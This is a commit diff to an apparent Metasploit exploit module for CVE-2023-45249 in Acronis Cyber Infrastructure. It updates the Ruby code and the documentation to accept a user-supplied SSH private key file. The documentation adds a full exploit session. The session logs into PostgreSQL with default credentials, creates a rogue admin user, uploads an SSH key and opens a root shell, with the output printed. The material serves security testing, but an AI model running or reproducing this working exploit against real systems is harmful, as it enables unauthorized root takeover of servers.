fifth release with the option to use your own SSH private key

Author: h00die-gr3y

documentation/modules/exploit/linux/http/acronis_cyber_infra_cve_2023_45249.md

@@ -53,14 +53,12 @@ This option is required and is PostgreSQL database port (default: 5432) to conne
 ### SSHPORT
 This option is required and is the SSH port (default: 22) to establish a SSH session.
 
-### PRIV_KEY
-This option is optional and allows the use of your own SSH private key.
+### PRIV_KEY_FILE
+This option is optional and allows the use of your own SSH private key file in PEM format.
+Generate your SSH private key with following command `ssh-keygen -t rsa -b 2048 -m PEM -f <your_priv_key>` or
+convert your existing SSH private key to PEM format with `ssh-keygen -p -N "" -m PEM -f /path/to/existing/private/key`
 If no key is provided, a private SSH key will be generated.
 
-### PUB_KEY
-This option is optional and allows the use of your own SSH public key.
-If no key is provided, a public SSH key will be generated.
-
 ## Scenarios
 ```msf
 msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > info
@@ -98,22 +96,21 @@ Check supported:
   Yes
 
 Basic options:
-  Name        Current Setting  Required  Description
-  ----        ---------------  --------  -----------
-  DATABASE    keystone         yes       The database to authenticate against
-  DBPORT      6432             yes       PostgreSQL DB port
-  PASSWORD    vstoradmin       no        The password for the specified username. Leave blank for a random password.
-  PRIV_KEY                     no        SSH Private Key
-  PUB_KEY                      no        SSH Public Key
-  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
-  RHOSTS                       yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
-                                         cs/using-metasploit.html
-  RPORT       8888             yes       The target port (TCP)
-  SSHPORT     22               yes       SSH port
-  SSL         true             no        Negotiate SSL/TLS for outgoing connections
-  TARGETURI   /                yes       Path to the Acronis Cyber Infra application
-  USERNAME    vstoradmin       yes       The username to authenticate as
-  VHOST                        no        HTTP server virtual host
+  Name           Current Setting  Required  Description
+  ----           ---------------  --------  -----------
+  DATABASE       keystone         yes       The database to authenticate against
+  DBPORT         6432             yes       PostgreSQL DB port
+  PASSWORD       vstoradmin       no        The password for the specified username. Leave blank for a random password.
+  PRIV_KEY_FILE                   no        SSH private key file in PEM format (ssh-keygen -t rsa -b 2048 -m PEM -f <priv_key_file>)
+  Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-me
+                                            tasploit.html
+  RPORT          8888             yes       The target port (TCP)
+  SSHPORT        22               yes       SSH port
+  SSL            true             no        Negotiate SSL/TLS for outgoing connections
+  TARGETURI      /                yes       Path to the Acronis Cyber Infra application
+  USERNAME       vstoradmin       yes       The username to authenticate as
+  VHOST                           no        HTTP server virtual host
 
 Payload information:
 
@@ -135,7 +132,7 @@ References:
   https://security-advisory.acronis.com/advisories/SEC-6452
   https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249
 
-View the full module info with the info -d command
+View the full module info with the info -d command.
 ```
 ## Scenarios
 ### Acronis Cyber Infrastructure 4.7 appliance Unix/Linux command
@@ -190,6 +187,59 @@ uid=0(root) gid=0(root) groups=0(root)
 uname -a
 Linux aci-471-53.vstoragedomain 3.10.0-1160.41.1.vz7.183.5 #1 SMP Thu Sep 23 18:26:47 MSK 2021 x86_64 x86_64 x86_64 GNU/Linux
 ```
+### Acronis Cyber Infrastructure 4.7 appliance Interactive SSH using your own SSH private key file in PEM format
+```msf
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > ssh-keygen -t rsa -b 2048 -m PEM -f /tmp/aci_rsa
+[*] exec: ssh-keygen -t rsa -b 2048 -m PEM -f /tmp/aci_rsa
+
+Generating public/private rsa key pair.
+Enter passphrase (empty for no passphrase):
+Enter same passphrase again:
+Your identification has been saved in /tmp/aci_rsa
+Your public key has been saved in /tmp/aci_rsa.pub
+The key fingerprint is:
+SHA256:H1Ewu7NLZdYIV4SQZPhsaGkXb/IG9fQgZEjqfKBRTIg root@cerberus
+The key's randomart image is:
++---[RSA 2048]----+
+|     . +o+B*+oo  |
+|    E ..oo+=+.o  |
+|      . o=++.+ o |
+|       ==.B=oo. .|
+|      .oSo=== .  |
+|         o Bo    |
+|          +.     |
+|         . .     |
+|          .      |
++----[SHA256]-----+
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set target 1
+target => 1
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set PRIV_KEY_FILE /tmp/aci_rsa
+PRIV_KEY_FILE => /tmp/aci_rsa
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > set rhosts 192.168.201.5
+rhosts => 192.168.201.5
+msf6 exploit(linux/http/acronis_cyber_infra_cve_2023_45249) > exploit
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 4.7.1-53
+[*] Creating admin user gzarzyh with password XiloxPsdto for access at the Acronis Admin Portal.
+[*] Saving admin credentials at the msf database.
+[*] Using your own SSH private key file: /tmp/aci_rsa in PEM format.
+[*] Saving SSH public and private key pair at the msf database.
+[*] Uploading SSH public key at the Acronis Admin Portal.
+[*] Authenticating with SSH private key.
+[*] Executing Interactive SSH for generic/ssh/interact
+[*] SSH session 1 opened (192.168.201.8:40083 -> 192.168.201.5:22) at 2024-09-20 09:40:22 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux aci-471-53.vstoragedomain 3.10.0-1160.41.1.vz7.183.5 #1 SMP Thu Sep 23 18:26:47 MSK 2021 x86_64 x86_64 x86_64 GNU/Linux
+ls -l .ssh
+total 4
+-rw------- 1 root root 872 Sep 20 11:40 authorized_keys
+cat .ssh/authorized_keys
+ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCauf4JO4xGHWulsoHHOwTXztTvJ4FQz92RTicFIqqHOPvR3vsXkWYJP4vE109/ZnUh64jsMqMb+x66q3+D86rts/ST4smpMjQpL2uwfrn3KHKwVmH7vMYb07q4F8M2nw4TgzYcsXONqAyxmbW0ZJ3P3CdlXXiXMvyUmy55OyVgaBnjoiE1GJxXnssCqPMkf0MaZfZqaaBk3onaKnJ4pRROHe1LEaagSM7dOHjS1F6ViVUYtcfFLQfXj4Q7WsWS5uSUy6HkxDn5PNvzUli7SDJ5aPTDqmmeDjzoVlUl7ZP4CYZlrTpZ1v0C0IuI3qlZmuHPuGaCDN7ymPsRUV71aqv3 root VSTOR-KEY-ID:1966f610-e22a-4147-bec3-4cfb945bdee7
+```
 
 ## Limitations
 No limitations.

modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb

@@ -95,8 +95,7 @@ def initialize(info = {})
       OptString.new('TARGETURI', [true, 'Path to the Acronis Cyber Infra application', '/']),
       OptPort.new('DBPORT', [true, 'PostgreSQL DB port', 6432]),
       OptPort.new('SSHPORT', [true, 'SSH port', 22]),
-      OptString.new('PUB_KEY', [false, 'SSH Public Key', '']),
-      OptString.new('PRIV_KEY', [false, 'SSH Private Key', ''])
+      OptString.new('PRIV_KEY_FILE', [false, 'SSH private key file in PEM format (ssh-keygen -t rsa -b 2048 -m PEM -f <priv_key_file>)', ''])
     ])
     register_advanced_options([
       OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])
@@ -289,36 +288,35 @@ def exploit
     # log out from the postsgreSQL DB
     postgres_logout if postgres_conn
 
-    # create or use user provided SSH key pair
-    if datastore['PUB_KEY'].blank? || datastore['PRIV_KEY'].blank?
+    # create or use own SSH private key
+    if datastore['PRIV_KEY_FILE'].blank?
       print_status('Creating SSH private and public key.')
-      k = SSHKey.generate
-      priv_key = k.private_key
-      pub_key = "#{k.ssh_public_key} root"
+      k = SSHKey.generate(comment: 'root')
     else
-      print_status('Using user provided SSH private and public key.')
-      priv_key = datastore['PRIV_KEY']
-      pub_key = "#{datastore['PUB_KEY']} root"
+      print_status("Using your own SSH private key file: #{datastore['PRIV_KEY_FILE']} in PEM format.")
+      fail_with(Failure::NotFound, "Can not find or open SSH private key file: #{datastore['PRIV_KEY_FILE']}") unless File.file?(File.expand_path(datastore['PRIV_KEY_FILE']))
+      f = File.read(File.expand_path(datastore['PRIV_KEY_FILE']))
+      k = SSHKey.new(f, comment: 'root')
     end
-    vprint_status(priv_key)
-    vprint_status(pub_key)
+    vprint_status(k.private_key)
+    vprint_status(k.ssh_public_key)
 
     # storing SSH public and private key at the msf database
     print_status('Saving SSH public and private key pair at the msf database.')
-    store_valid_credential(user: 'ACI SSH public key', private: pub_key)
-    store_valid_credential(user: 'ACI SSH private key', private: priv_key)
+    store_valid_credential(user: 'ACI SSH public key', private: k.ssh_public_key)
+    store_valid_credential(user: 'ACI SSH private key', private: k.private_key)
 
     # log in with the new admin user credentials at the Acronis Admin Portal
     fail_with(Failure::NoAccess, "Failed to authenticate at the Acronis Admin Portal with #{username} and #{password}") unless aci_login(username, password)
 
     # upload the public ssh key at the Acronis Admin Portal to enable root access via SSH
     print_status('Uploading SSH public key at the Acronis Admin Portal.')
-    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(pub_key)
+    fail_with(Failure::NoAccess, 'Failed to upload SSH public key.') unless upload_sshkey(k.ssh_public_key)
 
     # login with SSH private key to establish SSH root session
     ssh_opts = ssh_client_defaults.merge({
       auth_methods: ['publickey'],
-      key_data: [ priv_key ],
+      key_data: [ k.private_key ],
       port: datastore['SSHPORT']
     })
     ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']